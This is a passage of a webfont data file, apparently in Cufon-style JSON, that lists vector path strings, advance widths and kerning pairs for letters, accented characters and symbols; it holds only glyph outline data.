6r273,0v16,41,34,103,47,143v31,90,49,149,56,178r-79,-3","w":1344},{"d":"817,-238v-5,58,7,123,60,98r30,-47r18,-7v13,10,33,16,35,37v-28,99,-59,156,-160,156v-104,0,-139,-57,-179,-147v-56,99,-159,148,-312,153v-149,5,-242,-96,-187,-225v68,-158,310,-197,476,-275v8,-91,0,-225,-30,-261v-52,-63,-198,-15,-223,38v-15,12,-26,113,-37,134v-12,22,-88,47,-108,57v-36,18,-65,26,-86,26v-30,-32,-8,-99,10,-132v42,-72,160,-162,244,-189v91,-30,261,-48,348,2v96,55,99,122,102,296r-3,165xm349,-192v0,52,38,99,86,99v70,0,143,-69,157,-101v9,-20,12,-172,5,-232v-70,23,-195,94,-228,153v-13,22,-20,49,-20,81xm679,-1001v-63,0,-123,-57,-123,-118v0,-72,53,-130,123,-130v67,0,124,57,124,124v0,68,-56,124,-124,124xm218,-1124v0,-67,57,-125,129,-125v62,0,118,61,118,125v0,67,-57,124,-124,124v-68,0,-123,-56,-123,-124","w":981,"k":{"w":20,"v":23}},{"d":"398,-17v-111,-5,-215,9,-345,10v-1,-15,-2,-42,-2,-81v46,-10,169,-29,183,-54v13,-12,20,-37,25,-74v4,-25,7,-256,5,-384r-204,0r0,-91r205,0r-3,-446v-3,-34,-8,-52,-53,-47r-158,17r-1,-88v208,-69,693,-94,942,-42v222,46,364,187,450,355v97,191,84,472,-22,642v-60,96,-145,169,-253,231v-130,74,-382,63,-580,50xm536,-363v-6,195,90,251,255,257v159,6,231,-49,301,-120v138,-140,153,-551,54,-746v-79,-155,-220,-255,-434,-258v-68,0,-127,9,-176,28v-7,119,-2,238,-2,362v0,48,3,98,3,149r378,0r0,91r-379,0r2,123v-1,66,-2,104,-2,114","w":1600},{"d":"450,-241v-3,90,57,263,52,334v-10,159,-129,265,-265,302v-36,10,-85,16,-146,19r0,-46v111,-19,190,-80,195,-188v4,-86,-52,-249,-48,-339v5,-115,72,-208,157,-260v35,-23,92,-45,169,-66v-153,-47,-229,-90,-292,-197v-26,-45,-37,-90,-37,-131v0,-80,53,-248,49,-333v-6,-117,-76,-173,-193,-195r0,-46v215,-21,402,125,413,317v4,78,-57,253,-54,347v4,118,81,191,196,206r0,61v-117,17,-192,92,-196,215","w":811},{"d":"745,-148v-96,81,-171,163,-318,164v-107,1,-196,-50,-230,-118v-43,-86,-29,-153,-29,-340v0,-65,5,-114,5,-145v0,-78,6,-97,-13,-137v-40,-22,-133,-2,-116,-59v1,-7,2,-18,3,-33v7,-3,13,-5,18,-6r320,2r-1,470v-3,149,10,241,141,248v86,5,143,-43,184,-79v22,-19,33,-41,40,-59r9,-313r-4,-169v-28,-20,-87,-20,-134,-24v-14,-1,-15,-28,-15,-37v0,-8,1,-19,3,-34v122,-12,224,3,363,-5r-1,592v-3,35,-4,54,-4,59v-1,25,10,48,26,49v34,2,72,-5,104,-1v3,41,5,33,0,62v-133,6,-190,40,-310,78r-40,-2","w":1131},{"d":"540,-858v212,0,357,113,422,266v49,116,36,273,-10,367v-73,151,-204,238,-411,242v-198,4,-354,-108,-419,-229v-48,-91,-63,-240,-25,-356v44,-135,151,-229,279,-270v45,-14,100,-20,164,-20xm319,-389v0,158,10,170,54,258v40,79,216,114,291,33v72,-78,87,-176,86,-359v0,-121,-22,-205,-60,-257v-62,-85,-204,-101,-286,-33v-34,29,-57,71,-70,127v-9,36,-15,113,-15,231","w":1067,"k":{"x":35,"w":20,"v":35,"g":35}},{"d":"1298,-806v31,2,125,-11,172,-11r-1,60v-81,29,-117,23,-136,66r-152,344v-25,49,-96,225,-152,360r-75,0r-189,-420v-5,-12,-12,-24,-19,-37r-180,365v-16,29,-29,58,-41,89r-89,0r-325,-696v-19,-54,-77,-58,-123,-76v-1,-24,-2,-36,1,-56v51,-5,150,11,216,11v57,0,183,-17,237,-11v2,24,4,34,-2,54v-34,14,-97,8,-104,40v30,102,76,183,115,277v31,74,64,129,84,173r27,60v63,-111,110,-216,142,-315r-45,-95v-19,-41,-38,-79,-58,-113r-107,-29r0,-55r235,8r235,-5r-3,57v-26,2,-94,8,-119,18v33,83,57,133,66,153r156,336r96,-214v35,-98,77,-165,81,-233v-15,-35,-28,-29,-95,-52v-32,-4,-54,-8,-65,-12r5,-52v71,-4,141,9,212,11","w":1451,"k":{"\u00f6":41,"\u00e5":53,"\u00e4":53,"q":35,"o":41,"e":20,"d":35,"c":35,"a":53,".":158,",":139}},{"d":"135,382v-51,0,-83,-41,-83,-96v0,-47,45,-220,50,-261v7,-63,8,-145,8,-220r0,-627r215,0r0,518v0,90,5,146,15,167v15,33,40,49,73,49v78,0,121,-53,160,-111r0,-623r215,0r0,575v0,73,5,119,16,137v8,14,18,21,29,21v42,-12,49,-57,59,-115r36,0v-3,134,-75,228,-197,228v-94,0,-137,-58,-155,-150v-77,85,-136,150,-263,150v-70,0,-82,-20,-130,-61v-10,83,42,236,45,315v2,59,-38,104,-93,104","w":939},{"d":"234,-988v-7,-214,26,-226,-153,-226v-17,0,-31,-1,-42,-3r-3,-79v72,-5,264,10,297,9r373,-10v-2,25,1,52,1,79v-37,5,-76,8,-116,8v-95,0,-82,17,-86,141r2,88v-2,60,4,118,4,174v0,145,1,285,9,424v7,128,49,217,138,264v167,88,419,29,497,-86v62,-91,67,-144,69,-308v2,-172,-30,-390,-30,-598v0,-116,-83,-115,-188,-108r-13,-3r2,-76r79,0v123,6,255,13,374,-1r17,2v6,38,9,43,2,73v-34,13,-138,17,-152,28v-9,8,-14,20,-14,37v1,44,4,75,6,139r7,242v8,202,29,476,-42,585v-93,141,-270,223,-513,220v-278,-4,-471,-89,-511,-326v-31,-184,-7,-472,-14,-689xm967,-1437v-63,0,-123,-57,-123,-118v0,-72,53,-130,123,-130v67,0,124,57,124,124v0,68,-56,124,-124,124xm506,-1560v0,-67,57,-125,129,-125v62,0,118,61,118,125v0,67,-57,124,-124,124v-68,0,-123,-56,-123,-124","w":1557,"k":{"A":170}},{"d":"245,-275v114,2,219,123,209,250v-17,217,-94,307,-275,386v-53,23,-62,-13,-83,-66v8,-20,12,-16,41,-31v61,-31,135,-103,135,-181v0,-62,-25,-55,-83,-92v-63,-40,-94,-49,-96,-130v-2,-79,67,-137,152,-136","w":533},{"d":"834,-1571v-64,49,-140,125,-220,190r-79,-3r193,-349r214,0r188,353r-78,1xm111,-490v-57,-217,11,-469,125,-594v127,-139,308,-243,573,-243v282,0,487,118,602,289v183,273,128,621,-79,848v-182,200,-589,270,-877,140v-140,-63,-215,-150,-287,-274v-17,-31,-36,-86,-57,-166xm796,-78v288,-9,407,-220,405,-537v0,-64,-7,-199,-26,-277v-49,-200,-175,-336,-404,-336v-199,0,-294,151,-336,312v-36,137,-30,391,10,511v54,162,55,170,150,258v37,34,128,71,201,69","w":1621},{"d":"260,-736r3,-204v-3,-35,-2,-90,-2,-119r2,-135v-41,25,-88,48,-142,69v-13,-17,-25,-31,-32,-49v101,-44,159,-84,218,-147r114,0v10,73,2,146,1,226r-4,345v1,55,-1,49,41,56v10,2,32,4,67,10v4,21,4,25,1,45r-154,-3r-230,4v-1,-22,-1,-24,0,-45v54,-15,79,-11,109,-25v6,-5,8,-15,8,-28","w":640},{"d":"745,-148v-96,81,-171,163,-318,164v-107,1,-196,-50,-230,-118v-43,-86,-29,-153,-29,-340v0,-65,5,-114,5,-145v0,-78,6,-97,-13,-137v-40,-22,-133,-2,-116,-59v1,-7,2,-18,3,-33v7,-3,13,-5,18,-6r320,2r-1,470v-3,149,10,241,141,248v86,5,143,-43,184,-79v22,-19,33,-41,40,-59r9,-313r-4,-169v-28,-20,-87,-20,-134,-24v-14,-1,-15,-28,-15,-37v0,-8,1,-19,3,-34v122,-12,224,3,363,-5r-1,592v-3,35,-4,54,-4,59v-1,25,10,48,26,49v34,2,72,-5,104,-1v3,41,5,33,0,62v-133,6,-190,40,-310,78r-40,-2xm714,-1001v-63,0,-123,-57,-123,-118v0,-72,53,-130,123,-130v67,0,124,57,124,124v0,68,-56,124,-124,124xm253,-1124v0,-67,57,-125,129,-125v62,0,118,61,118,125v0,67,-57,124,-124,124v-68,0,-123,-56,-123,-124","w":1131},{"d":"1069,-1607v56,0,66,-30,81,-89r58,1v3,150,-79,256,-209,263v-107,6,-213,-86,-308,-86v-59,0,-71,28,-87,84r-59,1v-12,-140,84,-257,205,-261v116,-4,213,87,319,87xm1492,-1164v-19,39,-6,111,-6,163v0,97,6,173,8,229r15,464r0,123r4,208r-115,4r-119,-123r-413,-411r-125,-128r-222,-211r-163,-147r10,442v-1,145,5,279,21,417v1,7,6,17,12,30v26,9,83,15,170,21v6,0,15,4,26,7r4,81v-76,3,-90,-14,-241,-14v-106,0,-177,3,-212,6v-62,4,-48,7,-91,0v-3,-32,-2,-41,-1,-76v44,-11,165,6,184,-15v32,-35,21,-256,25,-262r2,-380v-4,-109,3,-290,-18,-364v-14,-47,-62,-76,-101,-94v-17,-7,-62,-17,-135,-28r-4,-70r197,-4v83,6,164,-2,247,0v103,93,186,174,251,241r708,707r-25,-594v-8,-87,-12,-138,-12,-151v-1,-104,-20,-92,-110,-112v-36,-8,-64,-14,-82,-23r1,-59v70,-7,149,-7,223,-9r262,-7r1,65v-26,17,-112,31,-121,39v-34,19,-52,31,-55,35","w":1728},{"d":"398,-17v-111,-5,-215,9,-345,10v-1,-15,-2,-42,-2,-81v47,-10,171,-29,184,-55v12,-11,20,-33,23,-65v1,-8,8,-110,7,-305r-3,-624v-3,-34,-8,-52,-53,-47r-158,17r-1,-88v208,-69,693,-94,942,-42v222,46,364,187,450,355v97,191,84,472,-22,642v-60,96,-145,169,-253,231v-130,74,-382,63,-580,50xm536,-362v-6,195,91,250,255,256v159,6,231,-49,301,-120v138,-140,153,-553,54,-747v-79,-154,-220,-254,-434,-257v-68,0,-127,9,-176,28v-7,119,-3,238,-2,362r4,380","w":1600,"k":{"\u00c5":76,"\u00c4":76,"Y":76,"W":20,"V":76,"A":76,".":57,",":39}},{"d":"111,-490v-57,-217,11,-469,125,-594v127,-139,308,-243,573,-243v282,0,487,118,602,289v183,273,128,621,-79,848v-182,200,-589,270,-877,140v-140,-63,-215,-150,-287,-274v-17,-31,-36,-86,-57,-166xm796,-78v288,-9,407,-220,405,-537v0,-64,-7,-199,-26,-277v-49,-200,-175,-336,-404,-336v-199,0,-294,151,-336,312v-36,137,-30,391,10,511v54,162,55,170,150,258v37,34,128,71,201,69xm999,-1437v-63,0,-123,-57,-123,-118v0,-72,53,-130,123,-130v67,0,124,57,124,124v0,68,-56,124,-124,124xm538,-1560v0,-67,57,-125,129,-125v62,0,118,61,118,125v0,67,-57,124,-124,124v-68,0,-123,-56,-123,-124","w":1621,"k":{"Y":57,"X":94,"W":39,"V":57,"T":39,"A":76}},{"d":"475,-1320r159,0r0,726r-159,0r0,-726xm475,-216r159,0r0,726r-159,0r0,-726","w":1109},{"d":"745,-148v-96,81,-171,163,-318,164v-107,1,-196,-50,-230,-118v-43,-86,-29,-153,-29,-340v0,-65,5,-114,5,-145v0,-78,6,-97,-13,-137v-40,-22,-133,-2,-116,-59v1,-7,2,-18,3,-33v7,-3,13,-5,18,-6r320,2r-1,470v-3,149,10,241,141,248v86,5,143,-43,184,-79v22,-19,33,-41,40,-59r9,-313r-4,-169v-28,-20,-87,-20,-134,-24v-14,-1,-15,-28,-15,-37v0,-8,1,-19,3,-34v122,-12,224,3,363,-5r-1,592v-3,35,-4,54,-4,59v-1,25,10,48,26,49v34,2,72,-5,104,-1v3,41,5,33,0,62v-133,6,-190,40,-310,78r-40,-2xm345,-1280r273,0v16,41,34,103,47,143v31,90,49,149,56,178r-79,-3","w":1131},{"d":"543,-901v9,-2,25,-36,39,-36v18,6,35,9,39,30v-21,63,-42,99,-114,99v-51,0,-90,-24,-117,-73v-44,48,-105,75,-193,76v-87,1,-146,-29,-146,-99v0,-38,20,-71,59,-98v39,-27,125,-63,256,-108v2,-69,13,-165,-56,-162v-47,1,-85,20,-94,66v-11,59,-9,55,-60,76v-44,18,-74,27,-87,28v-13,-2,-23,-14,-22,-28v8,-93,96,-144,173,-173v85,-32,266,-34,296,54v21,61,12,218,13,309v0,20,2,33,14,39xm230,-927v-5,54,60,64,98,35v40,-30,39,-36,40,-118v0,-19,-1,-33,-2,-44v-84,43,-128,47,-136,127","w":619},{"d":"507,-68v-3,24,9,53,-8,62r-192,-9v-97,-1,-180,9,-272,11v-5,-22,-4,-34,-3,-59v26,-17,112,-20,129,-27v5,-14,8,-36,9,-66r7,-523r0,-287v-2,-92,0,-125,-14,-180v-37,-30,-48,-27,-119,-37v-2,-23,-1,-27,1,-52v18,-10,234,-59,309,-92r40,2r2,444r-6,440v33,-20,102,-65,207,-134v44,-30,118,-84,162,-126v-41,-17,-72,-20,-122,-41v-2,-24,-1,-26,2,-52v72,-2,141,2,211,4v60,1,167,-13,225,-6v2,20,1,23,-3,44v-55,18,-139,40,-178,63v-55,31,-149,92,-280,181r407,406v14,10,42,24,83,43v1,35,2,29,0,57v-132,-15,-356,-7,-474,-4v-1,-23,-7,-38,2,-60v24,-10,68,-12,104,-17v-10,-18,-22,-35,-37,-50r-259,-276r-54,29r2,279v31,28,65,22,119,33","w":1088,"k":{"\u00f6":35,"y":-51,"o":35,"e":35}},{"d":"234,-988v-7,-214,26,-226,-153,-226v-17,0,-31,-1,-42,-3r-3,-79v72,-5,264,10,297,9r373,-10v-2,25,1,52,1,79v-37,5,-76,8,-116,8v-95,0,-82,17,-86,141r2,88v-2,60,4,118,4,174v0,145,1,285,9,424v7,128,49,217,138,264v167,88,419,29,497,-86v62,-91,67,-144,69,-308v2,-172,-30,-390,-30,-598v0,-116,-83,-115,-188,-108r-13,-3r2,-76r79,0v123,6,255,13,374,-1r17,2v6,38,9,43,2,73v-34,13,-138,17,-152,28v-9,8,-14,20,-14,37v1,44,4,75,6,139r7,242v8,202,29,476,-42,585v-93,141,-270,223,-513,220v-278,-4,-471,-89,-511,-326v-31,-184,-7,-472,-14,-689xm558,-1716r273,0v16,41,34,103,47,143v31,90,49,149,56,178r-79,-3","w":1557},{"d":"1557,-689r-2,426v34,0,57,2,93,-1r0,99r-94,1r-3,172v-54,1,-95,-5,-148,3r-1,-175r-247,-2v-9,0,-22,1,-39,2r0,-86v34,-55,183,-257,232,-312v39,-44,73,-87,102,-127v41,-1,59,-3,107,0xm1404,-264v5,-84,-1,-177,3,-266v-35,38,-149,191,-197,264xm373,26r887,-1362v33,-8,77,4,114,0r-889,1362v-42,3,-75,-7,-112,0xm412,-844v0,-66,-43,-122,-99,-124v-19,0,-44,9,-75,27r-40,-42v75,-47,122,-85,147,-111v47,-50,10,-131,-55,-131v-45,0,-87,27,-127,80r-55,-26v48,-98,118,-145,234,-149v104,-4,182,42,182,124v0,80,-48,103,-117,151v99,11,177,77,177,174v0,157,-144,251,-327,251v-77,0,-134,-14,-173,-36v-64,-35,-32,-105,37,-105v35,0,69,19,100,56v18,22,40,33,67,33v82,0,124,-80,124,-172","w":1707},{"d":"176,-1047r110,-111r398,399r398,-399r111,111r-397,399r393,393r-111,111r-393,-394r-396,394r-111,-111r395,-393","w":1365},{"d":"211,-98v-83,-76,-141,-186,-137,-322v5,-164,65,-278,185,-361v85,-59,151,-78,292,-78v89,0,176,24,259,72r119,-134r51,44v-19,28,-81,92,-114,135v25,29,53,60,75,98v79,134,73,319,-5,453v-76,130,-197,208,-417,208v-99,0,-184,-34,-252,-74r-121,135r-50,-43xm712,-675v-44,-75,-75,-114,-177,-114v-70,0,-90,15,-142,54v-61,80,-72,133,-73,289v0,90,6,158,17,204xm359,-162v39,105,189,144,289,77v111,-74,116,-321,88,-508","w":1067},{"d":"90,-1302v158,0,355,33,507,8v25,7,8,46,12,73v-52,17,-103,22,-167,33v-6,2,-7,9,-8,17v64,119,213,332,304,482v13,21,24,37,35,48r115,-160v27,-36,75,-93,125,-182r85,-151v17,-29,25,-32,17,-60v-25,-23,-92,-14,-138,-29v-1,-9,-3,-33,-6,-74r205,11v64,11,139,-4,202,-8r-1,75v-51,12,-110,23,-128,41v-72,67,-117,163,-213,303r-164,235r312,2v11,0,22,1,35,4r0,94v-98,0,-227,-2,-387,-5r-1,120v-1,13,-2,26,-3,37v169,0,300,1,391,2r0,94r-230,5r-160,-1r3,173v14,21,30,15,75,21v64,9,100,11,107,17v16,14,4,42,5,72r-115,-2v-157,-17,-346,-17,-495,2r-69,-1r0,-65v68,-17,147,-23,207,-48r0,-171r-406,-2r0,-94v142,7,263,-3,405,-2v-3,-58,5,-113,-19,-154v-173,0,-302,1,-386,2r0,-94r125,-3r187,-13r-206,-311v-62,-96,-71,-127,-154,-230v-42,-33,-38,-21,-126,-43v-10,-19,-2,-33,-2,-60v18,-5,60,-8,125,-8","w":1344},{"d":"235,-959v21,-73,55,-180,102,-321r274,3r-301,319v-45,1,-42,2,-75,-1","w":683},{"d":"579,-740v-82,-3,-278,-6,-314,21v-61,26,-97,93,-137,147r-67,-2v18,-82,41,-119,78,-256v10,-36,20,-65,29,-87r60,1v9,29,3,73,16,97v15,9,42,8,63,8r559,-11v5,27,6,31,4,56v-93,113,-149,182,-167,207r-310,409r-54,63v81,6,127,-4,264,-19v43,-5,70,-12,83,-21v13,0,86,-118,123,-178r64,1r-36,296r-776,-2r0,-57r35,-47r188,-232r157,-206v51,-67,97,-129,138,-188","k":{"\u00f6":35,"o":35,"e":35,"d":35,"c":37}},{"d":"374,26r887,-1362v33,-8,77,4,114,0r-889,1362v-42,3,-75,-7,-112,0xm267,-736r3,-204v-3,-35,-2,-90,-2,-119r2,-135v-41,25,-88,48,-142,69v-13,-17,-25,-31,-32,-49v101,-44,159,-84,218,-147r114,0v10,73,2,146,1,226r-4,345v1,55,-1,49,41,56v10,2,32,4,67,10v4,21,4,25,1,45r-154,-3r-230,4v-1,-22,-1,-24,0,-45v54,-15,79,-11,109,-25v6,-5,8,-15,8,-28xm1387,-682v181,0,303,160,191,300v-30,38,-131,128,-306,268r212,0v76,6,75,-25,98,-76v0,0,54,-9,68,3v1,43,-7,72,-26,189r-240,-2r-275,2r0,-42v88,-99,118,-114,189,-191v61,-66,146,-129,152,-242v4,-80,-41,-126,-116,-126v-78,0,-121,53,-128,133r-66,0v-2,-17,-3,-32,-3,-43v5,-100,123,-173,250,-173","w":1707},{"d":"69,-422v0,-263,185,-437,445,-437v62,0,119,15,172,46v-39,-111,-95,-204,-169,-280r-220,133r-33,-55r205,-129v-26,-23,-77,-62,-154,-117r29,-65v89,27,170,63,242,106r180,-109r35,57r-153,97v227,173,340,408,340,707v0,212,-72,343,-204,425v-115,71,-347,80,-474,14v-149,-78,-241,-188,-241,-393xm368,-718v-68,81,-72,528,2,594v72,98,244,102,314,-4v81,-81,69,-502,2,-585v-74,-92,-242,-95,-318,-5","w":1067},{"d":"530,-1001v-63,0,-123,-57,-123,-118v0,-72,53,-130,123,-130v67,0,124,57,124,124v0,68,-56,124,-124,124xm69,-1124v0,-67,57,-125,129,-125v62,0,118,61,118,125v0,67,-57,124,-124,124v-68,0,-123,-56,-123,-124","w":683},{"d":"658,-4v-141,-23,-411,-25,-576,-2r0,-72v37,-11,138,-33,163,-50v27,-44,17,-134,17,-204r1,-282v5,-132,7,-200,7,-204r-2,-133v6,-70,-3,-140,-3,-211v-1,-7,-3,-17,-7,-32v-28,-16,-109,-22,-168,-27r-3,-88r352,14v39,2,225,-10,281,-14v2,31,1,43,-1,76v-47,18,-131,34,-176,52v-8,29,-3,110,-3,145v0,113,-3,199,-3,260r1,264r-3,134r1,238v0,5,1,13,4,23v74,15,92,15,172,26v5,37,5,46,3,84xm185,-1716r273,0v16,41,34,103,47,143v31,90,49,149,56,178r-79,-3","w":811},{"d":"343,-520v-111,5,-187,-123,-126,-220v16,-26,55,-68,119,-68v77,0,150,59,150,131v0,101,-66,153,-143,157","w":683},{"d":"111,-194v-78,-212,47,-367,228,-430v-123,-58,-226,-173,-226,-310v0,-228,145,-369,370,-380v244,-12,447,227,315,448v-47,79,-94,96,-161,137v0,3,18,17,55,35v54,26,157,146,182,213v22,59,16,200,-3,248v-14,34,-77,135,-105,156v-58,44,-163,100,-276,99v-99,-1,-195,-15,-253,-59v-70,-53,-97,-78,-126,-157xm481,-1221v-137,-5,-243,156,-160,276v62,89,105,97,246,173v63,-57,97,-118,97,-232v0,-128,-68,-213,-183,-217xm492,-72v123,1,205,-76,201,-198v-5,-138,-64,-173,-173,-244v-67,-44,-104,-63,-111,-63v-11,0,-32,19,-65,56v-44,51,-66,115,-66,190v0,146,84,257,214,259"},{"d":"90,-1302v158,0,355,33,507,8v25,7,8,46,12,73v-52,17,-103,22,-167,33v-6,2,-7,9,-8,17v64,119,213,332,304,482v13,21,25,38,34,49r104,-146v34,-43,89,-111,137,-197r85,-151v17,-29,25,-32,17,-60v-25,-23,-92,-14,-138,-29v-1,-9,-3,-33,-6,-74r205,11v64,11,139,-4,202,-8r-1,75v-51,12,-108,25,-128,41v-29,24,-65,80,-121,164r-130,195v-92,131,-132,171,-166,252r-4,196r4,256v14,21,30,15,75,21v64,9,100,11,107,17v16,14,4,42,5,72r-115,-2v-157,-17,-346,-17,-495,2r-69,-1r0,-65v68,-17,147,-23,207,-48r-3,-353v11,-49,-73,-149,-101,-191r-196,-298v-62,-96,-71,-127,-154,-230v-42,-33,-38,-21,-126,-43v-10,-19,-2,-33,-2,-60v18,-5,60,-8,125,-8","w":1344,"k":{"\u00e5":150,"\u00d6":57,"\u00c5":39,"\u00c4":39,"v":39,"u":76,"q":133,"p":76,"o":170,"e":170,"d":152,"a":150,"S":-39,"O":57,"G":57,"C":57,"A":39,";":76,":":76,".":193,"-":76,",":174}},{"d":"382,385v74,0,97,-76,46,-121v-15,-26,-101,-48,-145,-75v-18,-30,11,-45,55,-80v30,-23,73,-64,126,-125r108,0v-10,15,-70,69,-75,84v0,5,4,11,11,19v59,69,85,74,88,164v7,197,-308,267,-472,177v-81,-44,5,-136,61,-136v53,0,137,93,197,93","w":683},{"d":"118,317v0,-63,62,-127,123,-127v69,0,167,78,235,153v29,33,57,47,79,47v53,-1,103,-63,100,-127v-2,-52,-47,-145,-72,-179r-250,-337v-138,-189,-170,-206,-225,-395v-23,-78,-31,-163,-19,-247v1,-7,5,-52,34,-129v62,-166,213,-302,459,-302v118,0,205,19,260,58v39,27,59,62,59,103v2,102,-100,172,-196,117v-35,-8,-179,-141,-203,-156v-65,-41,-134,18,-134,83v0,88,27,119,70,194v28,49,54,83,73,105v19,22,97,114,219,284v57,79,119,164,156,257v54,137,89,253,39,409v-48,149,-93,193,-182,274v-134,122,-429,117,-566,26v-40,-26,-59,-64,-59,-111xm302,-1142v-75,57,-116,147,-116,277v0,65,9,120,27,166v33,84,75,162,128,235v103,141,160,219,173,234v114,149,163,190,208,340v22,75,20,167,-11,227v94,-60,169,-270,119,-430v-106,-340,-441,-586,-542,-901v9,-91,13,-140,14,-148","w":1024},{"d":"540,-858v212,0,357,113,422,266v49,116,36,273,-10,367v-73,151,-204,238,-411,242v-198,4,-354,-108,-419,-229v-48,-91,-63,-240,-25,-356v44,-135,151,-229,279,-270v45,-14,100,-20,164,-20xm319,-389v0,158,10,170,54,258v40,79,216,114,291,33v72,-78,87,-176,86,-359v0,-121,-22,-205,-60,-257v-62,-85,-204,-101,-286,-33v-34,29,-57,71,-70,127v-9,36,-15,113,-15,231xm722,-1001v-63,0,-123,-57,-123,-118v0,-72,53,-130,123,-130v67,0,124,57,124,124v0,68,-56,124,-124,124xm261,-1124v0,-67,57,-125,129,-125v62,0,118,61,118,125v0,67,-57,124,-124,124v-68,0,-123,-56,-123,-124","w":1067,"k":{"x":35,"w":20,"v":35}},{"d":"59,-1038v0,-187,159,-346,346,-346v187,0,346,159,346,346v0,185,-161,346,-346,346v-185,0,-346,-161,-346,-346xm620,-1039v0,-115,-100,-215,-215,-215v-117,0,-215,99,-215,215v0,115,100,215,215,215v115,0,215,-100,215,-215","w":811},{"d":"539,-429v-335,-7,-528,-155,-538,-474v-6,-203,128,-369,274,-417v156,-52,585,-33,834,-36r0,44v-94,-5,-163,12,-182,79v-5,15,-7,57,-7,124r0,1551r-99,0r0,-1722r-182,0r0,1722r-100,0r0,-871","w":1109},{"d":"718,-1272v-224,229,-317,445,-322,883v-2,146,31,374,68,461v74,175,120,225,253,361v-14,17,-30,35,-47,52v-160,-81,-371,-329,-452,-521v-99,-233,-96,-553,-1,-778v78,-185,303,-422,444,-512v21,18,40,36,57,54","w":725},{"d":"404,-464v-8,22,-85,207,-106,307v4,56,41,51,102,64v6,1,30,5,71,11v0,38,3,46,-1,73v-41,0,-140,-6,-296,-17v-63,12,-133,21,-200,19r2,-68v28,-9,153,-29,160,-42v11,-8,29,-26,41,-58r439,-1151r108,1r183,430v39,87,73,173,106,255r136,342v14,37,56,143,85,177v35,25,98,20,146,43v5,35,6,41,4,71v-94,1,-230,-15,-323,-14v-53,0,-91,1,-114,2r-219,11v0,-23,1,-46,3,-67v48,-11,138,-26,169,-44v14,-13,13,-31,5,-50r-119,-294xm444,-569r301,2v-33,-101,-115,-303,-156,-388xm821,-1437v-63,0,-123,-57,-123,-118v0,-72,53,-130,123,-130v67,0,124,57,124,124v0,68,-56,124,-124,124xm360,-1560v0,-67,57,-125,129,-125v62,0,118,61,118,125v0,67,-57,124,-124,124v-68,0,-123,-56,-123,-124","w":1344,"k":{"y":20,"w":20,"v":39,"Y":20,"W":23,"V":115,"U":39}},{"d":"311,-1135v-64,49,-140,125,-220,190r-79,-3r193,-349r214,0r188,353r-78,1xm43,-769v164,-19,206,-51,296,-133r62,1v12,105,10,124,8,246r-7,539v0,7,1,15,4,22v25,6,71,16,140,29v5,27,5,30,1,57r-247,-6v-109,0,-172,1,-190,2v-51,5,-53,8,-76,5r-1,-64v23,-5,121,-13,131,-22v35,-35,28,-58,27,-165r-5,-377v8,-87,-73,-64,-143,-83r0,-51","w":576},{"d":"124,-422v-147,-487,197,-908,667,-908v163,0,310,16,438,50v10,29,77,211,72,307r-91,0v-110,-151,-210,-255,-426,-255v-103,0,-187,40,-250,121v-86,109,-129,262,-129,457v0,226,36,320,113,433v54,80,175,134,298,134v196,0,307,-129,409,-273v25,-5,57,-7,97,-8v-8,68,-16,141,-36,206r-23,77v-184,131,-671,123,-863,-2v-135,-88,-230,-185,-276,-339xm734,385v74,0,97,-76,46,-121v-15,-26,-101,-48,-145,-75v-18,-30,11,-45,55,-80v30,-23,73,-64,126,-125r108,0v-10,15,-70,69,-75,84v0,5,4,11,11,19v59,69,85,74,88,164v7,197,-308,267,-472,177v-81,-44,5,-136,61,-136v53,0,137,93,197,93","w":1387},{"d":"503,-850v105,1,182,37,245,90v64,-51,174,-96,249,-94v212,6,348,133,363,332v0,10,-2,38,-17,36v-122,-18,-465,-15,-545,-6v-18,219,80,367,268,367v81,0,159,-25,235,-76v28,12,47,24,57,37v-79,98,-188,183,-371,181v-145,-2,-271,-61,-338,-152r-28,-36v-33,68,-62,84,-123,129v-83,59,-223,92,-326,27v-70,-44,-97,-139,-50,-219v15,-24,41,-49,79,-74v87,-56,242,-116,378,-200v10,-151,-4,-273,-125,-273v-85,0,-129,41,-144,134v-11,70,1,52,-45,81v-38,24,-111,61,-149,68v-11,2,-34,-13,-32,-34v12,-131,149,-248,258,-292v47,-19,102,-26,161,-26xm971,-787v-105,0,-188,89,-171,223v144,6,221,-1,343,-6v11,-109,-83,-217,-172,-217xm347,-272v-42,70,1,181,85,174v90,-7,137,-64,144,-157v7,-82,11,-105,6,-172v-39,19,-205,105,-235,155","w":1429},{"d":"234,-988v-7,-214,26,-226,-153,-226v-17,0,-31,-1,-42,-3r-3,-79v72,-5,264,10,297,9r373,-10v-2,25,1,52,1,79v-37,5,-76,8,-116,8v-95,0,-82,17,-86,141r2,88v-2,60,4,118,4,174v0,145,1,285,9,424v7,128,49,217,138,264v167,88,419,29,497,-86v62,-91,67,-144,69,-308v2,-172,-30,-390,-30,-598v0,-116,-83,-115,-188,-108r-13,-3r2,-76r79,0v123,6,255,13,374,-1r17,2v6,38,9,43,2,73v-34,13,-138,17,-152,28v-9,8,-14,20,-14,37v1,44,4,75,6,139r7,242v8,202,29,476,-42,585v-93,141,-270,223,-513,220v-278,-4,-471,-89,-511,-326v-31,-184,-7,-472,-14,-689xm672,-1395v21,-73,55,-180,102,-321r274,3r-301,319v-45,1,-42,2,-75,-1","w":1557},{"d":"111,-490v-57,-217,11,-469,125,-594v127,-139,308,-243,573,-243v282,0,487,118,602,289v183,273,128,621,-79,848v-182,200,-589,270,-877,140v-140,-63,-215,-150,-287,-274v-17,-31,-36,-86,-57,-166xm796,-78v288,-9,407,-220,405,-537v0,-64,-7,-199,-26,-277v-49,-200,-175,-336,-404,-336v-199,0,-294,151,-336,312v-36,137,-30,391,10,511v54,162,55,170,150,258v37,34,128,71,201,69","w":1621,"k":{"\u00c5":76,"\u00c4":76,"Y":57,"X":94,"W":39,"V":57,"T":39,"A":76,".":76,",":57}},{"d":"635,14v-131,0,-165,-25,-250,-66r1,388v-13,100,73,88,145,107v12,15,9,33,8,61v-164,-3,-315,-26,-477,-5v-32,4,-43,5,-65,3r0,-45v40,-28,116,-42,150,-65v41,-58,20,-174,18,-263r-8,-444r2,-387v-6,-138,9,-322,-16,-436v-34,-24,-75,-20,-120,-26v-2,-27,-3,-34,-1,-56v98,-9,234,-61,294,-105v20,-1,31,-2,54,0r-2,295v0,61,1,155,3,280v110,-68,175,-92,324,-94v183,-2,299,133,343,272v26,83,21,232,-10,306v-60,141,-191,280,-393,280xm778,-160v117,-209,26,-546,-235,-542v-49,0,-104,13,-166,38v-6,66,-1,342,-1,451v0,184,306,183,390,67v3,-3,7,-8,12,-14","w":1131},{"d":"354,5v-158,-19,-310,-17,-446,0r0,-